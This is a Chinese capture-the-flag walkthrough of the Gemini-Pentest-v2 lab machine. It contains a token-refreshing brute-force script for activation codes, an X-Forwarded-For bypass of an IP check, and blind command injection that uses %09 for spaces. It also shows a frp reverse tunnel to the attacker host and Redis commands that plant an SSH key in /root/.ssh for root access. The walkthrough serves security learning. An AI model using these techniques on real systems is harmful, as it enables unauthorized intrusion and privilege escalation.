18、Gemini-Pentest-v2

news2024/9/19 22:21:15

难度 中

目标 root权限 一个flag

靶机启动环境为VMware

kali 192.168.152.56 靶机 192.168.152.63

信息收集

web测试

访问80端口

上面介绍了一下这个系统是一个内部系统,让员工查看他们的个人资料还可以导出为PDF

页面还有一个链接是UserList可以访问但是页面什么都没有显示,怀疑可能是没有权限或者需要什么参数

继续目录扫描

基本都存在目录遍历,但是都是些php文件

使用gobuster扫描

gobuster dir -u http://192.168.152.63/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html

有一个黑名单

但是不知道这是哪个文件接收的参数,用上面跑出来的文件做了个字典去跑也没有发现

然后去看每个可以访问的页面,发现注册页面应该可以注册一个账户登录进去,还发现一个激活页面也可以访问有东西,其他的页面都是403以及需要登录的admin

尝试注册admin发现提示账号已存在

注册一个admin123,确实注册成功了,又提示需要激活

大概是需要上面那个激活页面进行激活吧

但是激活需要userid,在页面找了一圈发现在这个profile,点了会卡一会然后就是跳转但是跳转没用会在url显示userid

前面说激活码是6位数字那么可以尝试爆破一遍(15是我一开始跑截的图)

数目有点大估计得要一段时间

服了跑了一会发现很慢然后发现全是403发现有token验证。。。

于是写个简单的脚本进行跑,当然也可以使用bp的宏定义。

import requests
from bs4 import BeautifulSoup

url='http://192.168.152.63/activate.php'

session = requests.Session()  #保持会话
response = session.get(url)
text=response.text

soup = BeautifulSoup(text, 'html.parser')
token_value = soup.find('input', {'name': 'token'})['value']
# 生成从000000到999999的所有数字字符串
for i in range(1000000):
    number_str = f"{i:06d}"  # 使用格式化字符串,确保数字是6位,不足的前面补0

    data={'userid':15,'activation_code':number_str,'token':token_value}
    re = session.post(url=url, data=data)
    soup = BeautifulSoup(re.text, 'html.parser')
    token_value = soup.find('input', {'name': 'token'})['value']
    print(number_str)
    if re.status_code!=403:
        print('——————————————————————————————————————————————')
        break

写脚本还遇到一个之前没有注意的地方就是data数据如果用这个{}格式的字典会自动的进行url编码的,我一开始直接把post数据当成字符串进行传输发现一只是无效的token后面发现需要有url编码也就是请求头里有个Content-Type: application/x-www-form-urlencoded

激活码作者没有给很大的数字也是很快就跑出来了,而且是固定的000511。

再次访问就可以正常登录了

然后在这些新功能点翻一翻,测一测SQL注入啥的

翻了一圈没发现什么东西,最后在9emin1中发现泄露了密码的HASH

此账号为管理员

 

找个在线的解密网站 9emin1 secretpassword

不过使用9emin1 secretpassword没登录成功。。。

突然想到注册的时候有个账号名和一个昵称,又回去看了一下每个账号后面都有一个括号又有一个名字

于是使用 Gemini secretpassword登录成功了

尝试放我上面admin才有的功能点有个执行命令但是都403

看数据包发现是ip不允许

使用插件生成的ip可以绕过

具体尝试发现X-Forwarded-For: 127.0.0.1就可以

突破边界

在执行命令这里发现了前面黑名单出现的命令执行的参数testcmd

不过我尝试输入了几个命令并没有什么回显(注意这里也要有Content-Type: application/x-www-form-urlencoded才会执行,token也要对)

怀疑是无回显的根据黑名单的内容发现过滤了空格

找了一下可以替代空格的方式,发现黑名单中还过滤了{}最后发现%09可以替代

这里应该是没有curl命令。

一开始想尝试OOB带外数据的但是发现很多都被过滤了估计不太行,想了一下很多命令不行那么试着先上传msf的后门试试

但是尝试了并没有成功的上线后门

尝试上传一个sh文件看能执行不

然后执行

bash%09/tmp/jiaoben

成功的执行了,这里只能用bash不能用bin/bash不知道为什么

提权

使用

SHELL=/bin/bash script -q /dev/null

提升一下shell

在家目录下面看了下历史记录没啥,也就一个这个Gnupg没有见过有点可疑,去网上搜了一下是一个加密的东西,没看太懂

上传了提权辅助脚本进行了一下信息的收集,收获到一下比较可疑的内容

/var/backups/alternatives.tar.0

/home/gemini1/.gnupg/trustdb.gpg

/home/gemini1/.gnupg/pubring.kbx

usr/bin/wkhtmltopdf

/usr/bin/gettext.sh

同时查看发现开启了redis和mysql数据库

同时发现redis是root权限启动,mysql只是mysql权限启动

redis有一些手法的前提就是root权限启动的服务

但是在命令行运行会有问题,我怀疑是shell的问题

frps.toml的配置

然后将frpc 和frpc.toml传上去赋予执行权限、

然后先在kali启动frps

./frps -c ./frps.toml

然后再在靶机上启动

nohup ./frpc -c ./frpc.toml > output.log 2>&1 &

然后发现需要密码

一开始准备用msf的代理转发的但是不知道为什么没代理上,只能退其次选择内网穿透使用frp

现在本地修改一下frpc.toml的内容,将本地的6379穿透到kali的1088端口

redis的密码可以在配置文件中查看

cat /etc/redis/6379.conf

8a7b86a2cd89d96dfcc125ebcc0535e6

刚才登录后查看有没有什么东西

发现有个秘钥,将秘钥cp到本地后尝试使用公私钥连接发现连不上。。。

那么只能选择写入公钥的方式了

现在本地生成公私钥

然后先将公钥写入一个txt中间加一些换行

(echo -e "\n\n";cat Gemini.pub;echo -e "\n\n")>Gemini.txt

这是因为在写入的过程中会出现一些乱码影响

将公钥写入redis内存中,也就是保存到数据库

cat Gemini.txt|redis-cli -h 127.0.0.1 -p 1088 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set gongyao

然后

config set dir /root/.ssh

config set dbfilename authorized_keys

save

这就成功的将公钥写入数据库了

现在可以尝试使用ssh进行连接了

指定私钥进行连接

ssh -i Gemini root@192.168.152.63

查看flag

 总结

        算是比较麻烦的靶场,无回显的rce并且是不太清楚的环境的情况下也不知道什么命令可以执行。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2100980.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【自然语言处理】调用NLTK数据失败‘wordnet‘和‘punkt‘不存在[Errno 11004]问题解决

wordnet报错 明明已经按照了nltk包&#xff0c;但使用 WordNet 语料库时依然报错提示数据不存&#xff0c;依据以下代码在python中下载wordnet仍然报错&#xff1a; import nltk nltk.download(wordnet)运行后始终提示&#xff1a; [nltk_data] Error loading wordnet: <…

【算法】PageRank

一、引言 PageRank是由谷歌创始人拉里佩奇和谢尔盖布林在斯坦福大学读研究生时发明的一种算法&#xff0c;用于衡量网页的重要性。它基于一个简单的假设&#xff1a;更重要的网页会有更多的链接指向它。 二、算法原理 PageRank算法的核心思想是&#xff0c;一个网页的重要性可以…

如何找到适合的IT外包服务商

在信息技术迅速发展的今天&#xff0c;IT外包服务已成为企业运营中不可或缺的一部分。选择合适的IT外包服务商对于确保项目成功、提高效率和降低成本至关重要。下面一起探讨评估和选择IT外包服务商的关键因素。 关键因素一&#xff1a;专业资质与认证 选择IT外包服务商时&…

ROS 工具箱系统要求

ROS 工具箱系统要求 要为 ROS 或 ROS 2 生成自定义消息&#xff0c;或从 MATLAB 或 Simulink 软件中部署 ROS 或 ROS 2 节点&#xff0c;您必须构建必要的 ROS 或 ROS 2 软件包。要构建这些软件包&#xff0c;您必须具备 Python 软件、CMake 软件以及适用于您的平台的 C 编译器…

分支和循环以及猜数字游戏的实现

分支和循环以及猜数字游戏的实现目录 随机书生成randsrandtime设置随机数的范围 猜数字游戏的实现 随机书生成 rand C语言中有一个函数叫rand函数&#xff0c;它可以生成随机数&#xff0c;代码格式如下&#xff1a; int rand&#xff08;void&#xff09;rand函数会返回一个…

Unity(2022.3.41LTS) - UI详细介绍- Button(按钮)TMP

目录 零.简介 一、基本功能与重要性 二、属性和设置详解 三、使用方法深入探讨 四、优化和注意事项 零.简介 在 Unity 中&#xff0c;按钮&#xff08;Button&#xff09;是用户界面中非常重要的交互元素之一。以下是对 Unity 中按钮的更详细介绍&#xff1a; 一、基本功…

【docker】docker 是什么

docker 是什么 Docker 本质Docker 的引擎迭代Docker 和虚拟机的区别Docker 为什么比虚拟机资源利用率高&#xff0c;启动快Docker 和 JVM 虚拟化的区别&#xff1f; Docker 本质 Docker 本质其实是 LXC 之类的增强版&#xff0c;它本身不是容器&#xff0c;而是容器的易用工具…

《黑神话:悟空》背后的渲染技术解析

《黑神话&#xff1a;悟空》作为备受瞩目的国产单机游戏&#xff0c;承载了深厚的文化底蕴&#xff0c;其背后的渲染技术无疑是推动其视觉表现达到新高度的关键。这款游戏不仅融合了传统与创新的角色设计&#xff0c;还通过一系列前沿的图形渲染技术&#xff0c;为玩家带来了前…

JVM面试(三)类加载过程

什么是类加载&#xff1f; 前面的文章已经说过&#xff0c;我们手动敲代码&#xff0c;写出来的文件是.java文件。 虚拟机编译之后&#xff0c;可识别的文件是.class文件。 但是在真正运行的时候&#xff0c;在内存中进行各种流转&#xff0c;通过程序来进行执行的时候&#…

【深度解析】GPT-3.5、GPT-4.0、GPT-4o mini的区别,你了解多少?

在人工智能的浪潮中&#xff0c;GPT系列模型如同璀璨的明星&#xff0c;吸引着无数开发者和研究者的目光。随着技术的不断进步&#xff0c;OpenAI推出了多个版本的GPT模型&#xff0c;其中GPT-3.5、GPT-4.0、GPT-4o mini各具特色。今天&#xff0c;我们就来深入探讨它们之间的区…

Odoo:开源免费的OMS订单管理系统

企业全渠道订单管理服务平台 开源智造Odoo免费开源ERP全渠道订单管理应用包含渠道分销订单、零售订单、电商订单、直销订单四部分&#xff0c;主要服务于核心企业的渠道信息化管理&#xff0c;帮助企业从传统分销向移动互联、电商直销或渠道数字化订货转型、新零售转型&#xf…

笔记 10 : 彭老师课本第 5 章 , GPIO , vim 的复制剪切删除 ; uboot读写内存的 md , nm 命令

&#xff08;77&#xff09; 进入代码实验以来&#xff0c;开始有机会频繁的修改源代码。补充 vim 的使用&#xff1a; &#xff08;78&#xff09; 如何只查看某个文件的权限&#xff0c;属性&#xff1a; &#xff08;79&#xff09; 关于 rm 命令&#xff1a; &#xff08;…

【netty系列-09】深入理解和解决tcp的粘包拆包

Netty系列整体栏目 内容链接地址【一】深入理解网络通信基本原理和tcp/ip协议https://zhenghuisheng.blog.csdn.net/article/details/136359640【二】深入理解Socket本质和BIOhttps://zhenghuisheng.blog.csdn.net/article/details/136549478【三】深入理解NIO的基本原理和底层…

C#——XML序列化

开发环境 VS2022 .net core 6.0 序列化概念 序列化是将内存中的对象或者对象图&#xff08;一组相互引用的对象&#xff09;拉平为一个可以保存或进行传输的字节流&#xff0c;或者XML节点。反序列化正好相反&#xff0c;它把数据流重新构造成内存中的一个对象或者对象图。…

【位运算】--- 进阶题目赏析

Welcome to 9ilks Code World (๑•́ ₃ •̀๑) 个人主页: 9ilk (๑•́ ₃ •̀๑) 文章专栏&#xff1a; 算法Journey 本节我们来赏析位运算的一些进阶题目。 &#x1f3e0; 只出现一次的数字II &#x1f4cc; 题目解析 只出现一次的数字II &#x1f4cc; 算…

Anylogic制作界面元素tips

点击元素后跳转至其他视图&#xff0c;且能够把某个共同元素移植过去 navigate( viewStatistics2 ); groupControls.setX( groupControls.getX() 1200 );

python-笨小猴

题目描述 笨小猴的词汇量很小&#xff0c;所以每次做英语选择题的时候都很头疼。但是他找到了一种方法&#xff0c;经试验证明&#xff0c;用这种方法去选择选项的时候选对的几率非常大&#xff01; 这种方法的具体描述如下&#xff1a;假设maxn是单词中出现次数最多的字母的出…

kafka3.7.1 单节点 KRaft部署测试发送和接收消息

一、环境准备 kafka3.7.1 包下载地址&#xff1a; https://mirrors.nju.edu.cn/apache/kafka/3.7.1/kafka_2.13-3.7.1.tgz openjdk11.0.2 下载地址&#xff1a; https://mirrors.nju.edu.cn/openjdk/11.0.2/openjdk-11.0.2_linux-x64_bin.tar.gz 二、openjdk 安装 【如已安装…

设计模式学习-简单的命令模式例子

上一章节介绍过了命令模式&#xff0c;这一篇文章就简单的做一个小案例来巩固学习 搭建场景 简单的搭建一个场景就行 &#xff0c;随便准备一个物体放在场景中位置Reset一下即可。 代码编写 定义接口&#xff08;或者抽象类&#xff09;ICommand 用来规范Command的行为。注意…

在线音乐播放器项目

在线音乐播放器项目 登录页面 注册页面 主页 上传文件 我的喜欢 前端 js html css 三剑客 后端 Spring Boot框架 插件有:Spring Boot DevTools、Lombok、Spring Web、MySQL Driver、MyBatis Framework、security、detect 数据库有 三张表 lovemusic、music、user 工具类( co…